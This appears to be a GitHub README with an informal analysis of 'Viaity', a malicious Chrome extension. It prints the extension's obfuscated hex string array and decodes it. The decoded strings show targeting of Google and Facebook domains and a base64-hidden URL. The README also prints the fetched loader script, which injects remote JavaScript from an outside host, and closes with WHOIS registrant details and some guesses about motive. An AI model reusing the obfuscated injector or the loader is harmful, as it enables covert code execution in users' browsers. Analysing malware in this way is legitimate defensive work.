Skip to content

mohammedgad/Viaity-Malware

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Viaity-Malware

Viaity is a JavaScript malware (Chrome Extension)

#jw8tzr\dppzfzixq.js While reading dppzfzixq.js i found this suspicious array which obviously the array that contains the most used keywords

var G = ['\x73\x63\x72\x69\x70\x74', 
'\x6c\x61\x6e\x67\x75\x61\x67\x65', 
'\x52\x64\x72', 
'\x68\x74\x74\x70\x73\x3a', 
'', 
'\x61\x32\x78\x68\x63\x33\x52\x6c\x63\x6e\x4d\x75\x65\x48\x6c\x36\x4c\x7a\x41\x77\x4d\x6a\x49\x75\x61\x6e\x4d\x3d',
'\x61\x78\x6d\x56\x55', 
'\x47\x67\x69\x35\x44\x58\x30',
'\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64', 
'\x6c\x6f\x63\x61\x74\x69\x6f\x6e',
'\x2f\x2f', 
'\x6e\x79\x74\x69\x6d\x65\x73\x2e\x63\x6f\x6d', 
'\x69\x6e\x64\x65\x78\x4f\x66',
'\x64\x72\x69\x76\x65\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74', 
'\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d', 
'\x72\x65\x70\x6c\x61\x63\x65',
'\x68\x6f\x73\x74\x6e\x61\x6d\x65',
'\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d', 
'\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74',
'\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d', 
'\x6d\x61\x69\x6c\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d', 
'\x50\x38\x45\x37',
'\x46', 
'\x74\x79\x70\x65', 
'\x48\x65', 
'\x46\x54\x32\x73\x68\x32\x31', 
'\x68\x65\x61\x64', 
'\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74', 
'\x73\x72\x63'];

Keywords Found:

After Decoding The array here are the found keywords

Script         
language         
Rdr         
https                  
:a2xhc3RlcnMueHl6LzAwMjIuanM=         
axmVU         
Ggi5DX0         
appendChild         
location         
//        
nytimes.com         
indexOf         
drive.google.com         
text/javascript         
facebook.com         
replace         
hostname         
google.com         
createElement         
accounts.google.com        
mail.google.com        
P8E7        
F         
type        
He        
FT2sh21      
head        
javascript    
src

facebook.com, google.com, accounts.google.com, mail.google.com, drive.google.com, and nytimes.com!!

Okay now it seems like he wanna steal some information from my google and facebook accounts but why nytimes.com maybe he wanna hit their server with a DDos maybe. So interesting huh! Spcially the base64 a2xhc3RlcnMueHl6LzAwMjIuanM= after decoding it, it's a JavaScript file associated with a domain which owned by the hacker. http://klasters.xyz/0022.js

0022.js file content.

(function () {
var scr = document.createElement('script');
scr.type = 'text/javascript';
scr.async = true;
scr.src = 'https://extstat.com/code/?pid=444202&r=' + Math.floor(10000000 * Math.random());
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(scr, s);
})();

it seems like this malware is kinda botnet which executes 0022.js content this time it connects to https://extstat.com/code/ and i have no idea what is it maybe hits some ads to earn some money it's a guess next time he can change the content to something else who knows

http://whois.domaintools.com/klasters.xyz

Opppss!! The Hacker Forgot to guard this domain!

Domain Name: KLASTERS.XYZ
Domain ID: D32657463-CNIC
WHOIS Server: whois.reg.ru
Referral URL: https://www.reg.ru/
Updated Date: 2016-07-29T12:10:50.0Z
Creation Date: 2016-06-20T14:56:35.0Z
Registry Expiry Date: 2017-06-20T23:59:59.0Z
Sponsoring Registrar: Registrar of Domain Names REG.RU, LLC
Sponsoring Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant ID: C71037363-CNIC
Registrant Name: Stela Diacon
Registrant Organization: Cash Makers LP
Registrant Street: Suite 2,5 St. Vincent Street
Registrant City: Edinburgh
Registrant State/Province: Edinburgh
Registrant Postal Code: EH3 6SW
Registrant Country: GB
Registrant Phone: +380.947109131
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Admin ID: C71037367-CNIC
Admin Name: Stela Diacon
Admin Organization: Cash Makers LP
Admin Street: Suite 2,5 St. Vincent Street
Admin City: Edinburgh
Admin State/Province: Edinburgh
Admin Postal Code: EH3 6SW
Admin Country: GB
Admin Phone: +380.947109131
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
Tech ID: C71037375-CNIC
Tech Name: Stela Diacon
Tech Organization: Cash Makers LP
Tech Street: Suite 2,5 St. Vincent Street
Tech City: Edinburgh
Tech State/Province: Edinburgh
Tech Postal Code: EH3 6SW
Tech Country: GB
Tech Phone: +380.947109131
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: [email protected]
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU
DNSSEC: unsigned
Billing ID: C71037371-CNIC
Billing Name: Stela Diacon
Billing Organization: Cash Makers LP
Billing Street: Suite 2,5 St. Vincent Street
Billing City: Edinburgh
Billing State/Province: Edinburgh
Billing Postal Code: EH3 6SW
Billing Country: GB
Billing Phone: +380.947109131
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: [email protected]

Mother Russia!!!!.

More and More!! The email [email protected] is associated with other 18 domains!! and the company name associated with 21 domain!!

http://reversewhois.domaintools.com/?email=4ac46717409d6bec5ffebebdc48183a1

http://reversewhois.domaintools.com/cash-makers-lp

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published